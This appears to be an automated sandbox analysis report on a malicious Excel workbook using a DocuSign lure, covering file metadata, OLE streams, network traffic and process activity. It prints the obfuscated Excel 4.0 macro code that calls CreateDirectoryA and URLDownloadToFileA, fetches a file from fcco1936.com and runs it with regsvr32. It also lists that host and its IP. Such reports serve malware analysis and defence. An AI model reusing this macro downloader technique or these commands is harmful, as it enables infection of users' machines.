    SHA-512:4FBCFF88BF34662E6CF054CDAEA1248CF0AE9B7D62DE122F0CB47D289246B62AC2B9DD4553624517ADAB026ACCAA45B4784F8CD0AA586D50689DEF4B199E95E6
    Malicious:false
    Reputation:low
    Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:41:54 2020, Security: 0
    Entropy (8bit):7.522333980048165
    TrID:
    • Microsoft Excel sheet (30009/1) 78.94%
    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
    File name:document-1477931596.xls
    File size:338944
    MD5:1602c8c0a768d4c356e23fa86cca3daa
    SHA1:0c9b5477aa41c557e2169e3cc21fa57f4ad051bd
    SHA256:ba48de11db500e3903d175d9980adbb1305f991d839ec93068417c5eea86b424
    SHA512:30844a49d0027eb39246d0b6a9e7a04624bae6c72c41e9930daba03708b645f0b7b8994028d49ed7871d20c9af2f39003f4aeba6c1422a58caf5372195cb2b03
    SSDEEP:6144:AcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTK:5izo8RnsIROnr6n75YK
    File Content Preview:........................>......................................................................................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "document-1477931596.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:
    Last Saved By:
    Create Time:2006-09-16 00:00:00
    Last Saved Time:2020-11-26 09:41:54
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:917504

    Streams

    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.367004077607
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.254255489206
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326145
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:326145
    Entropy:7.65699487976
    Base64 Encoded:True
    Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
    Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

    Macro 4.0 Code

    CALL("Ke"&????2!FS355&"32", "Cr"&????2!FU383&"yA", "JCJ", ????2!FJ353&????2!FJ368, 0)
    
    CALL("U"&????2!FU373, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!FJ353&????2!FJ368&????2!FJ382, 0, 0)
    
    =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!FS355&""32"",""Cr""&????2!FU383&""yA"",""JCJ"",????2!FJ353&????2!FJ368,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
    "=CALL(""Ke""&????2!FS355&""32"",""Cr""&????2!FU383&""yA"",""JCJ"",????2!FJ353,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
    "=CALL(""U""&????2!FU373,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!FJ353&????2!FJ368&????2!FJ382,0,0)"=EXEC(????3!W36&????2!FJ353&????2!FJ368&????2!FJ382)=HALT()

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2020 04:16:01.548640013 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:16:01.613528967 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:16:01.613658905 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:16:01.614834070 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:16:01.675524950 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:16:01.676352978 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:16:01.676457882 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:16:06.680732012 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:16:06.681020975 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:16:06.944650888 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:16:06.944811106 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:16:07.208746910 CET8049165185.253.218.120192.168.2.22
    Nov 29, 2020 04:16:07.208832979 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:18:01.409507990 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:18:01.720571995 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:18:02.329070091 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:18:03.530421019 CET4916580192.168.2.22185.253.218.120
    Nov 29, 2020 04:18:03.600205898 CET8049165185.253.218.120192.168.2.22

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2020 04:16:01.454020977 CET5219753192.168.2.228.8.8.8
    Nov 29, 2020 04:16:01.530253887 CET53521978.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Nov 29, 2020 04:16:01.454020977 CET192.168.2.228.8.8.80xd372Standard query (0)fcco1936.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Nov 29, 2020 04:16:01.530253887 CET8.8.8.8192.168.2.220xd372No error (0)fcco1936.com185.253.218.120A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • fcco1936.com

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249165185.253.218.12080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    Nov 29, 2020 04:16:01.614834070 CET0OUTGET /ds/231120.gif HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: fcco1936.com
    Connection: Keep-Alive
    Nov 29, 2020 04:16:01.676352978 CET1INHTTP/1.1 401 Unauthorized
    Date: Sun, 29 Nov 2020 03:16:01 GMT
    Server: Apache
    WWW-Authenticate: Basic realm="Protected"
    Content-Length: 503
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><p>Additionally, a 401 Unauthorizederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Start time:04:15:40
    Start date:29/11/2020
    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Imagebase:0x13f450000
    File size:27641504 bytes
    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:04:15:44
    Start date:29/11/2020
    Path:C:\Windows\System32\regsvr32.exe
    Wow64 process (32bit):false
    Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Imagebase:0xff0a0000
    File size:19456 bytes
    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis

    Reset < >